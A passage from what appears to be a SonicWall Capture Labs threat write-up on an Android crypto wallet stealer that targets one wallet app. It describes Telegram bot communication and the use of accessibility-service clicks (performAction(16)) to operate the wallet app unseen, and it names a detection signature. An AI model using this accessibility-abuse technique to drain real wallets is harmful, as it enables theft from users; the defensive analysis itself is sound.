  • Elements of communication using Telegram bot

 

  • A number of app elements related to the target wallet app – com.wallet.crypto – which govern the different components of the legitimate crypto wallet app

  • performAction(16) can be seen at several places in the code. This action performs a ‘click’ or ‘touch’ on a mobile device, so these actions are intended to click a button. Accessibility services allows an application to perform such clicks in the background without the user’s knowledge

 

Overall this malware is a crypto wallet stealer with a single target app that is quite popular on the Google Play store. With the rise in crypto investments we expect more such malicious apps and scams to surface in the near future.

 

Sonicwall Capture Labs provides protection against this threat using the signature listed below:

  • AndroidOS.CryptoStealer.HT